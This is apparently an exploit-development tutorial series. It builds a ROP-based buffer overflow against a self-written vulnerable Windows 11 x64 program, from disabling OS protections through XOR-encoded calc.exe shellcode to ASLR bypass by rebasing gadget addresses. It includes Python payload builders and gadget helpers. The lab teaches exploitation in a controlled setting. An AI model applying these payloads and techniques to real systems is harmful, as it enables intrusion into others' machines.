Learning Objectives
- Disable Windows 11 Core Isolation and Exploit Protection for controlled learning
- Compile the vulnerable binary with stack protections disabled using MinGW-w64
- Navigate x64dbg — set breakpoints, step through instructions, inspect registers and stack
- Manually redirect RIP to an unreachable function using the debugger
- Understand why x64 buffer overflows use ROP rather than JMP RSP
The Challenge — x64 on Windows 11
Stack-based buffer overflows on x64 Windows 11 are a fundamentally different problem from the x86 exploits that filled offensive security courses for the past two decades. DEP is always enforced for 64-bit processes, backed by the CPU's NX bit. ASLR randomizes module base addresses every boot. Stack canaries are the default in modern compilers. The techniques that worked in 2010 crash immediately on a fully patched Windows 11 24H2 machine.
This series was born from a personal challenge: successfully exploit a buffer overflow on the latest fully-patched Windows 11, bypassing all modern mitigations. The answer is Return Oriented Programming (ROP) — reusing the program's existing instructions rather than injecting new code. This module sets up the environment and teaches the debugger before we touch any exploit code.
Step 1 — Disable Windows Protections for Learning
Before building the exploit we need a controlled environment. Parts 1–4 deliberately disable Windows security features so we can learn the core mechanics without fighting multiple protections at once. Part 5 re-enables everything and demonstrates ASLR bypass. This is the correct pedagogical order — learn the technique cleanly first, then add complexity.
Two locations to toggle off in Windows Security:
Navigate to: Windows Security → Device Security → Core Isolation → Core Isolation Details
Disable all toggles in this section including Memory Integrity. These features enforce integrity checks on code running in the kernel and restrict memory operations that our exploit will rely on. Disabling them for the learning environment does not permanently weaken your system — re-enable them after completing Parts 1–4.
⚠ Disabling Memory Integrity requires a reboot. You may see a notification in the taskbar warning that protection is reduced; this is expected during the lab phase.
Navigate to: Windows Security → App & Browser Control → Exploit Protection → System Settings
Disable DEP, ASLR, SEHOP, and all other protections listed. DEP (Data Execution Prevention) is the primary barrier — it prevents executing code on the stack. Even after disabling it here, hardware-level DEP (enforced by the NX bit on the CPU) may remain active. The series acknowledges this and addresses it in Part 3 using VirtualAlloc to create a separate RWX memory region rather than executing on the stack directly.
💡 Hardware DEP on modern x64 CPUs cannot be fully disabled by software settings alone. This is why the exploit uses VirtualAlloc + memcpy to move shellcode to a proper RWX region rather than attempting to execute directly from the stack.
Step 2 — The Vulnerable Binary
The target binary is purpose-built for this series. It includes several intentional design choices that make it exploitable and also provide the primitives we'll need for the full exploit chain:
Compile Flags — What Each Does and Why It Matters
Basic x64dbg workflow for this series:
- File → Open → select overflow.exe to load it
- Run (F9) twice — first run executes to the entry point, second gets the program running
- Set breakpoint — double-click on an address in the disassembly panel to toggle a breakpoint (red highlight)
- Step Over (F8) — execute the current instruction without following calls into functions
- Step Into (F7) — follow a CALL instruction into the called function
- Registers panel (top right) — shows current value of all 64-bit registers; changed values highlight in red
- Stack panel (bottom right) — shows the stack contents at RSP; critical for watching ROP gadget execution
💡 On a laptop with an Fn key, use Fn+F8 for Step Over and Fn+F7 for Step Into. Function key behavior varies by laptop manufacturer.
In x86 buffer overflows the classic technique is: overwrite EIP with the address of a JMP ESP gadget, place shellcode on the stack, and when EIP jumps to the gadget it executes JMP ESP, which jumps directly into the shellcode on the stack. This doesn't work in x64 for two reasons:
- DEP/NX: hardware-enforced non-executable stack. Even if you redirect RIP to the stack, the CPU raises a fault before executing any instruction there, and for a 64-bit process this protection cannot be switched off through system settings.
- RIP canonicality: x64 addresses must be canonical (with 48-bit virtual addressing, bits 47 through 63 must all be equal). If the overwritten return address is non-canonical, such as 0x4141414141414141, RET faults instead of loading it. RIP never shows your junk the way EIP did on x86. The next instruction is determined by what's on the stack and what RET pops.
ROP solves both: we chain together existing executable code snippets already in the binary (in read+execute memory, not the stack). Each gadget ends with RET, which pops the next gadget address from our controlled stack. No new code is executed on the stack; we're reusing what's already there.
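The canonicality rule can be checked directly. The sketch below assumes the common 48-bit virtual address width (4-level paging). It treats an address as canonical only when bits 47 through 63 are all equal. A return address overwritten with 0x41 bytes fails the test, so the RET typically faults with a general-protection exception before RIP ever holds the junk value.

```python
# Sketch: canonical-address check, ASSUMING 48-bit virtual addresses (4-level paging).
VA_BITS = 48

def is_canonical(addr: int, va_bits: int = VA_BITS) -> bool:
    """True if bits 63..(va_bits - 1) are all 0s or all 1s."""
    addr &= (1 << 64) - 1                  # treat the value as unsigned 64-bit
    upper = addr >> (va_bits - 1)          # bit 47 and everything above it
    return upper == 0 or upper == (1 << (64 - va_bits + 1)) - 1

# A saved return address overwritten with eight 'A' bytes is not canonical,
# while the win_function() address from Part 1 is.
junk = int.from_bytes(b"A" * 8, "little")  # 0x4141414141414141
print(hex(junk), is_canonical(junk))
print(hex(0x14000158C), is_canonical(0x14000158C))
```

The same check explains why a valid gadget address behaves differently from a junk fill. The former is loaded into RIP by RET; the latter never gets that far.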
Part 1 demonstrates debugger control before any exploit code. The workflow:
- Load overflow.exe in x64dbg and run it
- Find the address of win_function() in the disassembly and note it (around 0x14000158C)
- Set a breakpoint at the instruction after the std::cin call (0x1400015FB)
- Enter any input in the command prompt window
- Hit the breakpoint, then press F8 twice
- Double-click the RIP value in the register panel and type the address of win_function
- Press F8 to execute — calc.exe launches despite never being called by the program
This manual RIP manipulation is exactly what the buffer overflow automates in Part 2. Instead of typing in the address by hand, the overflow payload overwrites the return address on the stack, so when the function returns, it returns to win_function().
Learning Objectives
- Determine the exact byte offset needed to reach the return address (296 bytes)
- Use Python's subprocess and struct modules to craft and deliver a buffer overflow payload
- Attach x64dbg to a running process and verify stack control
- Observe how the overflow reaches the return address without placing it directly in RIP
Finding the Offset — 296 Bytes
The buffer is declared as char buffer[275] but the overflow needs 296 bytes to reach the saved return address on the stack. The extra 21 bytes account for the function's stack frame overhead — saved registers, alignment padding, and the gap between the buffer start and the saved RIP location. Finding this value typically involves sending increasing amounts of data until the stack shows control at the return address position, or using a cyclic pattern tool like pwndbg's cyclic function.
Having written the vulnerable program ourselves gives the shortcut of knowing the buffer is 275 bytes — adding 20–30 bytes to find the exact offset is quick empirical work.
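When the buffer size isn't known, a cyclic pattern finds the offset in one run. pwndbg's cyclic needs a GDB setup, so here is a standalone Python sketch of the Metasploit-style pattern (Aa0Aa1...Aa9Ab0...) instead. That is a different but equivalent pattern scheme, and the helper names are hypothetical. Send the pattern and let the RET fault on the non-canonical value. Then read the 8 bytes at RSP in x64dbg and look them up. The pattern is made only of letters and digits, so it contains no whitespace and survives std::cin.

```python
import string

def cyclic_pattern(length: int) -> bytes:
    """Metasploit-style pattern; its 4-byte windows are intended to be unique
    for up to 26 * 26 * 10 * 3 = 20280 bytes."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("patterns longer than 20280 bytes are not unique")

def pattern_offset(seen: int, length: int = 20280, width: int = 8) -> int:
    """Offset of the little-endian qword read from [RSP], or -1 if absent."""
    needle = seen.to_bytes(width, "little")
    return cyclic_pattern(length).find(needle)

payload = cyclic_pattern(400)   # comfortably larger than the 275-byte buffer
```

If the qword at RSP is passed to pattern_offset, the result is the number of junk bytes needed before the return address.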
Why We Don't See the Address in RIP
A common point of confusion for developers coming from x86: after the overflow, the address of win_function() does not appear in the RIP register. Instead, the stack panel shows the 0x41 ('A') junk bytes filling the frame up to the saved return address, which now holds the address you supplied. That address is on the stack, waiting to be popped into RIP when the next RET instruction executes.
This is the fundamental shift from x86 thinking to x64 ROP thinking: stop watching RIP, watch the stack. RIP is just executing whatever the current RET pops. The attack surface is the stack contents, not RIP's current value.
The Python script pauses before sending the payload to allow attaching the debugger. In x64dbg:
- File → Attach (or Alt+A) → find overflow.exe in the process list → double-click
- x64dbg attaches and breaks. Your previously set breakpoints should still be active.
- Press F9 (Run) to let the process continue waiting for input
- Switch back to the Python terminal and press Enter to send the payload
- x64dbg should hit the breakpoint at 0x1400015FB
💡 The attach workflow is important because it mirrors real-world exploitation: you don't get to compile the target with debug symbols or control its launch. Attaching to a running process is the standard approach.
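The original Part 2 script isn't reproduced in this section. Below is a minimal sketch of the same idea using subprocess and struct, and the function names build_payload and deliver are hypothetical. The payload is 296 junk bytes followed by win_function()'s address packed as a little-endian 64-bit value ("<Q"). The script pauses so x64dbg can attach before the payload is written to the target's stdin.

```python
import struct
import subprocess

OFFSET = 296                 # bytes from the buffer start to the saved return address
WIN_FUNCTION = 0x14000158C   # from x64dbg; only valid while ASLR is disabled

def build_payload(offset: int, ret_addr: int, filler: bytes = b"A") -> bytes:
    """Junk up to the saved return address, then the new return address."""
    return filler * offset + struct.pack("<Q", ret_addr)

def deliver(exe_path: str, payload: bytes) -> None:
    """Start the target, pause for the debugger, then send the payload on stdin.
    The trailing newline is whitespace, which ends the std::cin >> read."""
    proc = subprocess.Popen([exe_path], stdin=subprocess.PIPE)
    input(f"PID {proc.pid}: attach x64dbg, press F9, then press Enter here...")
    proc.stdin.write(payload + b"\n")
    proc.stdin.close()
    proc.wait()
```

Usage would be `deliver("overflow.exe", build_payload(OFFSET, WIN_FUNCTION))`. The packed address bytes 8c 15 00 40 01 00 00 00 contain no whitespace, so std::cin reads all of them.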
win_function() begins with a function prologue (stack setup instructions such as pushing RBP and reserving stack space). A function normally runs only after a CALL has pushed an 8-byte return address, and its prologue is written with that in mind. We enter via the vulnerable function's RET instead, which pops 8 bytes and pushes nothing, so RSP arrives 8 bytes away from where the prologue expects it. Running the prologue from its first instruction can therefore leave the stack misaligned and crash later. 0x14000158C is the address inside win_function() after the prologue, at the point where the actual work (printing and launching calc.exe) begins. The stack is aligned at this point, so execution proceeds cleanly. In later parts, when we're building real ROP chains, this distinction becomes critical. ROP gadgets themselves don't have prologues: they're just mid-function code sequences ending in RET, and the stack state is whatever our ROP chain has constructed.
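The alignment argument can be checked with a little arithmetic. The Windows x64 calling convention requires RSP to be a multiple of 16 at every CALL. Instructions such as movaps fault on misaligned stack operands, so a misaligned CALL inside win_function() can crash deep in library code. The sketch below assumes a hypothetical prologue of "push rbp; mov rbp, rsp; sub rsp, 0x20" and a hypothetical aligned stack address. Check the real prologue in x64dbg.

```python
# Sketch of RSP alignment (mod 16) under the Windows x64 calling convention.
# The prologue sizes are HYPOTHETICAL: "push rbp" (8 bytes) + "sub rsp, 0x20".
FULL_PROLOGUE = 8 + 0x20      # entering at the first instruction
AFTER_PUSH = 0x20             # entering just past "push rbp"
AFTER_PROLOGUE = 0            # entering past the whole prologue

def entry_rsp_via_call(rsp_before_call: int) -> int:
    return rsp_before_call - 8        # CALL pushes an 8-byte return address

def entry_rsp_via_ret(rsp_at_ret: int) -> int:
    return rsp_at_ret + 8             # RET pops 8 bytes and pushes nothing

def aligned_at_inner_call(entry_rsp: int, prologue_bytes: int) -> bool:
    """Is RSP 16-byte aligned when win_function makes its own CALL?"""
    return (entry_rsp - prologue_bytes) % 16 == 0

ALIGNED = 0x61FE00                        # HYPOTHETICAL aligned stack address
vuln_entry = entry_rsp_via_call(ALIGNED)  # the vulnerable function was CALLed
normal = entry_rsp_via_call(ALIGNED)      # how win_function would normally start
hijacked = entry_rsp_via_ret(vuln_entry)  # its epilogue restored RSP, then RET

print(aligned_at_inner_call(normal, FULL_PROLOGUE))     # normal call path
print(aligned_at_inner_call(hijacked, FULL_PROLOGUE))   # RET into the first instruction
print(aligned_at_inner_call(hijacked, AFTER_PROLOGUE))  # RET past the prologue
```

Entering via RET lands 8 bytes higher than a normal CALL would. Skipping an 8-byte push in the prologue cancels that difference, and so does skipping the whole prologue.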
DEP (Data Execution Prevention) marks the stack as non-executable at the hardware level via the CPU's NX (No-Execute) bit. When the CPU attempts to execute an instruction at a non-executable memory address, it raises a hardware fault (#PF with execute-disable) before the instruction runs.
This is why the classic x86 technique — place shellcode in the buffer, redirect EIP/RIP to it — fails on modern Windows. Even if you successfully overwrite the return address to point into the buffer, the CPU refuses to execute from there.
The solution (covered in Part 3): use VirtualAlloc to allocate a new memory region with PAGE_EXECUTE_READWRITE permissions. The stack remains non-executable, but the newly allocated region is executable, and we copy our shellcode there with memcpy before jumping to it.
Learning Objectives
- Use Ropper and ROPgadget to enumerate available gadgets in the vulnerable binary
- Construct a ROP chain to set RCX, RDX, R8, and R9 for a VirtualAlloc call
- Understand why some registers (R8, R9) require creative multi-gadget chains
- Find the address of a specific constant value in memory using x64dbg's memory search
- Chain gadgets to execute VirtualAlloc and allocate RWX memory for shellcode
What Are ROP Gadgets?
ROP (Return Oriented Programming) gadgets are short instruction sequences already present in the binary's executable sections, each ending with a RET instruction. Because they already exist in executable memory, DEP doesn't prevent their execution. By chaining their addresses on the stack, we control what code executes simply by controlling where each RET goes.
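The goal here is to call VirtualAlloc(NULL, 1024, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) entirely through ROP, with no shellcode and no executable stack. The size only needs to be at least as large as the shellcode; the RDX chain below actually passes 0x1002. We need to set four registers to specific values: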
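Under the Windows x64 calling convention, the first four integer arguments travel in RCX, RDX, R8 and R9, in that order. A short Python sketch makes the register targets explicit. It uses the documented values of the VirtualAlloc constants and the 0x1002 size that this part's RDX chain produces. The helper register_plan is hypothetical.

```python
# Sketch: mapping VirtualAlloc's arguments onto the x64 argument registers.
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40

ARG_REGISTERS = ("rcx", "rdx", "r8", "r9")

def register_plan(*args: int) -> dict:
    """Map up to four integer arguments to the registers that carry them."""
    if len(args) > len(ARG_REGISTERS):
        raise ValueError("arguments 5+ are passed on the stack, not in registers")
    return dict(zip(ARG_REGISTERS, args))

# VirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect)
plan = register_plan(0, 0x1002, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE)
for reg, value in plan.items():
    print(f"{reg.upper():>3} = {value:#x}")
```

Each of the following subsections is a gadget chain that produces one line of this plan.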
Finding Gadgets — Ropper and ROPgadget
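Both tools list far more gadgets than you can read, and a gadget is only usable if its packed address survives std::cin. Below is a minimal Python sketch for filtering a saved listing, for example one produced with ROPgadget --binary overflow.exe > gadgets.txt. It assumes lines shaped like "0x0000000140001f8c : pop rax ; ret" (ROPgadget) or "0x...: pop rax; ret;" (Ropper, plain uncolored output); adjust the regular expression if your output differs. The helper names are hypothetical, and the bad-byte set is the whitespace that ends a std::cin >> read.

```python
import re

# Bytes that end a std::cin >> read: whitespace in the default "C" locale.
BAD_BYTES = {0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x20}

# ASSUMED line format: "<hex address> : <insn> ; <insn>" with an optional trailing ";".
LINE_RE = re.compile(r"^(0x[0-9a-fA-F]+)\s*:\s*(.+?);?\s*$")

def parse_gadgets(text: str) -> list[tuple[int, str]]:
    """Return (address, normalized instructions) for every gadget line."""
    gadgets = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            parts = [p.strip() for p in m.group(2).split(";") if p.strip()]
            gadgets.append((int(m.group(1), 16), "; ".join(parts)))
    return gadgets

def address_is_clean(addr: int) -> bool:
    """True if the 8-byte little-endian address contains no bad bytes."""
    return not any(b in BAD_BYTES for b in addr.to_bytes(8, "little"))

def find_clean(gadgets: list[tuple[int, str]], wanted: str) -> list[int]:
    """Addresses of gadgets matching `wanted` exactly, e.g. "pop rax; ret"."""
    return [a for a, insns in gadgets if insns == wanted and address_is_clean(a)]
```

Normalizing the separators lets one search string match output from either tool.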
Setting RCX = 0 (Easy)
The XOR ecx, ecx pattern — the canonical null-free zeroing technique — is the simplest register setup. Writing to ECX (32-bit) zero-extends into RCX (64-bit), so a single gadget is enough:
Setting RDX = 0x1002 (Moderate)
No gadget that loads the size directly into RDX exists. The creative solution: find a pop rax; ret gadget and use it to load the address where the value 0x1000 is stored in the binary (found via memory search in x64dbg). Dereference it into EAX (which zero-extends into RAX), then add it to EDX. With EDX already holding 2, the result is 0x1002 (2 + 0x1000 = 4098 bytes), more than enough allocation size:
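The exact gadgets from the original chain aren't reproduced here. The sequence below is a hypothetical reconstruction from the pieces this part names: xor ecx, ecx; pop rax; mov eax, dword ptr [rax]; add edx, eax. It also assumes EDX already holds 2. The tiny simulator walks the chain the way successive RETs do. It models memory as a dict of dwords rather than raw bytes and applies the x64 rule that any write to a 32-bit register clears the upper half of the 64-bit register. That same rule makes xor ecx, ecx a complete RCX = 0.

```python
MASK32 = 0xFFFFFFFF   # 32-bit register writes zero-extend into the 64-bit register

def run(chain, memory, regs):
    """Walk `chain` (the qwords laid out on the stack) the way successive RETs do.
    Strings name a gadget; integers are data that a gadget pops."""
    stack = list(chain)
    while stack:
        gadget = stack.pop(0)                          # RET pops the next gadget
        if gadget == "xor ecx, ecx; ret":
            regs["rcx"] = 0                            # ECX = 0 clears all of RCX
        elif gadget == "pop rax; ret":
            regs["rax"] = stack.pop(0)                 # next qword -> RAX
        elif gadget == "mov eax, dword ptr [rax]; ret":
            regs["rax"] = memory[regs["rax"]] & MASK32     # 4-byte load, zero-extended
        elif gadget == "add edx, eax; ret":
            regs["rdx"] = (regs["rdx"] + regs["rax"]) & MASK32  # 32-bit add, zero-extended
        else:
            raise ValueError(f"unknown gadget: {gadget!r}")
    return regs

MEMORY = {0x1400000AC: 0x1000}      # dword found by the x64dbg pattern search
START = {"rax": 0x4141414141414141, "rcx": 0xDEADBEEF12345678,
         "rdx": 0xFFFF000000000002}  # ASSUMPTION: low 32 bits of RDX already hold 2
CHAIN = ["xor ecx, ecx; ret",
         "pop rax; ret", 0x1400000AC,
         "mov eax, dword ptr [rax]; ret",
         "add edx, eax; ret"]

regs = run(CHAIN, MEMORY, dict(START))
print({name: hex(value) for name, value in regs.items()})
```

The garbage in the upper halves of RCX and RDX disappears, which is why 32-bit gadgets are perfectly usable for setting 64-bit arguments.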
Setting R8 = 0x3000 and R9 = 0x40 (Hard)
R8 and R9 are among the most sparingly used registers in the binary's code, so few gadgets manipulate them directly. The solution routes values through RAX and RBX as intermediaries. R9 in particular is "hated": it requires a gadget that also includes add rsp, 0x48, which advances the stack pointer by 72 bytes. The chain therefore needs 72 bytes of NOP padding after that gadget to compensate:
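The padding rule comes down to counting the bytes a gadget consumes between its address and its RET. The Python sketch below uses hypothetical gadget addresses and a hypothetical helper name. It lays out a gadget whose side effect is add rsp, 0x48, so the next gadget address sits 72 bytes further down the chain. Unwanted POPs are handled the same way at 8 bytes each.

```python
import struct

def q(value: int) -> bytes:
    """Pack one 64-bit stack slot, little-endian."""
    return struct.pack("<Q", value)

def gadget_with_skip(addr: int, rsp_skip: int = 0, extra_pops: int = 0,
                     filler: bytes = b"\x90") -> bytes:
    """The gadget's address followed by the junk its side effects consume before
    its RET: 8 bytes per unwanted POP plus rsp_skip bytes for an 'add rsp, N'."""
    return q(addr) + filler * (8 * extra_pops + rsp_skip)

R9_GADGET = 0x140002F10      # HYPOTHETICAL address of a gadget ending "add rsp, 0x48; ret"
NEXT_GADGET = 0x140003A40    # HYPOTHETICAL next gadget in the chain

chain = gadget_with_skip(R9_GADGET, rsp_skip=0x48) + q(NEXT_GADGET)
print(len(chain))            # 8 + 72 + 8 = 88 bytes
```

Only the number of skipped bytes matters when they are junk. If one of the POPs is meant to load a real value, that value has to sit in the matching slot instead of filler.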
A key technique from Part 3: when you need to load a specific value into a register but can't find a mov reg, imm gadget, find a location in the binary where that value already exists. Then use a memory dereference gadget (mov eax, dword ptr [rax]) to load it. In x64dbg: Memory Map tab → right-click the binary's section → Search for Pattern → enter the hex value you need. The tool returns all addresses where that byte sequence appears. Pick the first result in the binary's own memory range (not a DLL).
- Value 0x1000 (4096 decimal, used for dwSize) was found at 0x1400000AC
- Value 0x0040 (0x40 = PAGE_EXECUTE_READWRITE) was found at 0x140000018
- Value 0x3000 (MEM_COMMIT|MEM_RESERVE) was found at 0x1400095AC
💡 This technique works because the compiler often embeds constant values from the source code into the binary's .text or .rdata sections. A statically linked binary is particularly rich because it includes the entire C runtime library with its own constants. The PE headers, which are mapped at the image base, are another source: the first two hits above lie in the header page below 0x140001000.
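The same search can be scripted over a memory image of the module, for example a dump of the mapped module. Do not use the raw .exe file, whose section file offsets differ from their virtual addresses. This minimal sketch, with a hypothetical helper name, mirrors x64dbg's pattern search for a little-endian dword. Four bytes is the width mov eax, dword ptr [rax] reads.

```python
def find_constant(image: bytes, base: int, value: int, size: int = 4) -> list[int]:
    """Every virtual address in `image` (mapped at `base`) holding `value`
    as a little-endian `size`-byte integer."""
    needle = value.to_bytes(size, "little")
    hits, start = [], 0
    while (i := image.find(needle, start)) != -1:
        hits.append(base + i)
        start = i + 1          # allow overlapping matches
    return hits

# Tiny synthetic image: 0x40 at offset 0x18 and 0x3000 at offset 0x24.
image = bytes(0x18) + (0x40).to_bytes(4, "little") + bytes(8) + (0x3000).to_bytes(4, "little")
print([hex(a) for a in find_constant(image, 0x140000000, 0x40)])
```

Any hit still has to pass the same bad-byte check as a gadget address, because it is delivered on the stack for pop rax to load.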
Real ROP chains almost never use gadgets that do exactly one thing. The reality is you work with whatever the binary provides. Common side effects and how to handle them:
- Extra POPs — a gadget that pops into registers you don't care about. Solution: pad those stack positions with junk values (0x90909090 works well as it's a NOP sled in x86, harmless as a value).
- add rsp, N — advances the stack pointer, skipping over N bytes of your carefully laid chain. Solution: pad those N bytes with NOPs after the gadget address in your payload.
- Clobbering registers — a gadget that sets a register you already set. Solution: order your gadgets carefully — set the clobbered register after the gadget that clobbers it.
- CALLs inside gadgets: some gadgets contain a CALL (for example call rax), which pushes a return address onto the stack in the middle of your chain and jumps to the call target. Solution: ensure the call target (usually another ROP gadget address already in RAX) is set up before the gadget runs.
This creativity is what makes ROP chain development genuinely difficult. It's less programming and more puzzle-solving with the specific pieces available in your binary.
Learning Objectives
- Understand why std::cin requires encoding — bad characters that break payload delivery
- XOR-encode shellcode with key 0xAC and embed a self-decoding stub
- Build a ROP chain to call memcpy and copy shellcode from stack to the VirtualAlloc'd region
- Understand the NOP sled's role in the final payload layout
- Assemble the complete exploit: shellcode + padding + ROP chain for VirtualAlloc + memcpy
The Bad Character Problem
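std::cin >> buffer stops reading at whitespace characters: 0x20 (space) and 0x09 through 0x0D (tab, newline, vertical tab, form feed, carriage return). Any shellcode byte or ROP gadget address containing one of these bytes truncates the payload. Null bytes (0x00) are not whitespace, so operator>> reads them like any other byte. That is why 8-byte gadget addresses with 0x00 upper bytes survive delivery; the shellcode is kept NULL-free anyway. The solution is XOR encoding: transform every byte so none of the problematic values appear in the payload, then include a decoder stub that restores the original bytes at runtime before execution.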
XOR Encoding with Key 0xAC
The key 0xAC was chosen because XOR-ing the shellcode bytes with it produces no bad characters. The encoded payload is safe to send through std::cin. At runtime, the decoder stub XORs each byte back with 0xAC to restore the original shellcode before jumping to it.
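Choosing the key is a brute-force search over all single-byte keys. The Python sketch below has hypothetical helper names, and its bad-byte set is the std::cin whitespace. It keeps a key only if neither the key itself nor any encoded byte is bad. The key has to be clean too, because the decoder stub embeds it. XOR with the same key is its own inverse, which is all the decoder stub relies on.

```python
BAD_BYTES = {0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x20}   # std::cin whitespace

def xor_encode(data: bytes, key: int) -> bytes:
    """Encode (or decode: XOR is its own inverse) with a single-byte key."""
    return bytes(b ^ key for b in data)

def find_xor_keys(data: bytes, bad: set = BAD_BYTES) -> list[int]:
    """All keys for which neither the key nor any encoded byte is a bad byte."""
    return [k for k in range(1, 256)
            if k not in bad and not any(b in bad for b in xor_encode(data, k))]

sample = b"\x48\x31\xc9\x20"          # arbitrary bytes; note the raw 0x20
keys = find_xor_keys(sample)
print(0xAC in keys, len(keys))
```

Run against the real 207-byte shellcode, any key in the returned list works. 0xAC is simply one that passes.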
The Decoder Stub
The decoder stub is a small assembly routine prepended to the encoded shellcode. It XORs each byte back with the key at runtime, restoring the original shellcode in-place before jumping to it. This stub must itself be written in bytes that are safe to deliver — no bad characters in the stub encoding either.
memcpy ROP Chain — Copying Shellcode Off the Stack
After VirtualAlloc returns (the allocated address is in RAX), we chain into memcpy to copy the encoded shellcode from the stack into the RWX region. memcpy uses RCX (dst), RDX (src), R8 (size). The destination is the VirtualAlloc'd address (returned in RAX after the VirtualAlloc call). Source is the stack address where our shellcode sits. Size is 251 bytes (decoder stub + encoded shellcode).
A NOP sled (\x90 bytes) is placed before the decoder stub in the payload. memcpy copies the shellcode section to the RWX region, and we then jump to it. Slight imprecision in the jump target (due to register arithmetic approximations in the ROP chain) might land a few bytes before the exact start of the decoder stub. The NOP sled provides a "landing strip": landing on any of the 8 NOPs slides execution forward to the decoder stub.
8 bytes of NOP sled is minimal but sufficient given how RDX (the source pointer) is calculated from known stack offsets. Longer NOP sleds tolerate more imprecision at the cost of payload size.
💡 NOP sleds are also useful in x64 debugging: if your shellcode doesn't execute, step through the jump target in x64dbg. If you see a solid block of 0x90 instructions being executed, your landing is correct. If you see garbage, the source pointer calculation is off.
The trickiest part of the memcpy chain: figuring out RDX (the source address — where on the stack does our shellcode actually live?). The stack address at the time of the overflow is predictable relative to the stack state after the ROP chain starts.
The approach used: RSP points near the start of the ROP chain after the overflow. The shellcode is located at a known negative offset from RSP (it was placed before the junk padding). Track how RSP changes through each ROP gadget: each pop and ret advances RSP by 8, and each push decreases it by 8. From that you can calculate the exact offset and add it to the current RSP value to get the shellcode's address.
The blog series uses add edx, eax, where EAX holds the RSP-relative offset (calculated empirically from x64dbg observation), to set RDX to the shellcode's stack address. This is why the Part 4 payload has a specific pre-calculated value for the source pointer: it was determined by stepping through the exploit in x64dbg and reading the actual stack address.
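The bookkeeping behind that pre-calculated value can be written down explicitly. When the vulnerable function's RET executes, RSP points at payload offset 296. Any later RSP value equals that starting point plus the bytes the chain has consumed since. The sketch below uses hypothetical stack values and helper names. It recovers a payload address from an observed RSP and then computes the 32-bit operand for add edx, eax. That last step assumes the stack lives below 4 GB, because a 32-bit add discards the upper half of RDX.

```python
RET_OFFSET = 296   # payload offset of the saved return address

def payload_address(rsp_now: int, consumed: int, payload_offset: int,
                    ret_offset: int = RET_OFFSET) -> int:
    """Stack address of payload[payload_offset].

    rsp_now:  RSP observed at some point in the chain
    consumed: bytes RSP has moved forward since the vulnerable function's RET
              began (8 per RET/POP, N per 'add rsp, N', minus 8 per PUSH)
    """
    rsp_at_ret = rsp_now - consumed           # RSP pointed at payload[ret_offset]
    return rsp_at_ret - ret_offset + payload_offset

def add_edx_operand(rsp_now: int, target: int) -> int:
    """EAX value so that 'add edx, eax' with EDX = low 32 bits of RSP gives target."""
    return (target - rsp_now) & 0xFFFFFFFF

RSP_NOW, CONSUMED = 0x61FF40, 0xA8            # HYPOTHETICAL values read in x64dbg
src = payload_address(RSP_NOW, CONSUMED, 0)   # start of the NOP sled
print(hex(src), hex(add_edx_operand(RSP_NOW, src)))
```

A negative offset becomes a large 32-bit value (two's complement), which wraps around correctly in the 32-bit add.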
The calc.exe payload used in this exploit is the same PEB-walking shellcode from the x64 Assembly and Shellcoding course: 207 bytes, fully NULL-free, and dynamically resolving WinExec from kernel32.dll's export table at runtime via the PEB walk technique.
This is why the shellcoding course matters for exploit development: you need payloads that work without knowing exact DLL load addresses at compile time. Walking the PEB and the export table works regardless of ASLR because it resolves API addresses dynamically at runtime, not at exploit-construction time.
The XOR encoding adds another layer: even though the shellcode itself is NULL-free, std::cin imposes additional bad character restrictions. The 0xAC key was specifically chosen by iterating over possible keys until one produced no bad characters in the encoded output.
Learning Objectives
- Understand exactly what ASLR randomizes — and what it doesn't
- Use Python's psutil and ctypes to programmatically retrieve the base address of a running process
- Calculate dynamic ROP gadget addresses by adding fixed offsets to the runtime base
- Re-enable all Windows 11 security features and run the full working exploit
Re-Enable All Protections — The Real Challenge Begins
For Part 5, re-enable everything that was disabled for Parts 1–4:
- Core Isolation (all options including Memory Integrity)
- Exploit Protection (DEP, ASLR, SEHOP, all system settings)
- Secure Boot (verify in BIOS/UEFI settings)
With everything re-enabled, the Part 4 exploit fails immediately — the hardcoded 0x140001f8c addresses are now wrong because ASLR has randomized the binary's base address. The fix is straightforward: stop hardcoding addresses and discover them at runtime.
What ASLR Actually Randomizes
The key insight that makes ASLR bypassable here: ASLR randomizes the base address (the upper bits of the address), but the offset within the module stays constant. A gadget at 0x140001f8c with ASLR disabled becomes, say, 0x00d8001f8c with ASLR enabled; only the base portion changed. The 0x1f8c offset is always the same relative to the module base.
This means all our ROP gadget addresses can be expressed as base_addr + offset. We just need to discover base_addr at runtime, and we can reconstruct every gadget address dynamically.
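In code, rebasing is one subtraction and one addition. All the Part 1–4 addresses assume the image base 0x140000000. The runtime base is taken as an input here; the series discovers it with psutil and ctypes, which this sketch does not reproduce. The function names are hypothetical.

```python
PREFERRED_BASE = 0x140000000   # base that all Part 1-4 addresses assume

def to_offset(static_addr: int, preferred_base: int = PREFERRED_BASE) -> int:
    """Module-relative offset of an address recorded with ASLR off."""
    return static_addr - preferred_base

def rebase(static_addr: int, runtime_base: int,
           preferred_base: int = PREFERRED_BASE) -> int:
    """Translate an address recorded with ASLR off into this run's address."""
    return runtime_base + to_offset(static_addr, preferred_base)

print(hex(rebase(0x140001F8C, 0xD8000000)))      # the example base from the text
print(hex(rebase(0x1400095AC, 0x7FF6A1230000)))  # a HYPOTHETICAL high base
```

Because the whole offset is used rather than just the last four hex digits, this also works for gadgets more than 0xFFFF bytes into a large, statically linked image.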
Converting Static Addresses to Dynamic
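The only change to the Part 4 exploit is replacing every hardcoded address with base_addr + offset. The offset is the original address minus 0x140000000, so 0x140001f8c becomes base_addr + 0x1f8c. Offsets never change regardless of ASLR. Windows maps images on 64 KB boundaries, so the last four hex digits of each address also stay the same, but offsets larger than 0xFFFF carry more digits than that. With base_addr discovered at runtime, every ROP gadget is recalculated correctly for the current run.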
ASLR randomizes the module base address — the starting VA where the executable or DLL is mapped. It does not change the relative layout within the module. Every function, every instruction, every ROP gadget is at a fixed position relative to the base.
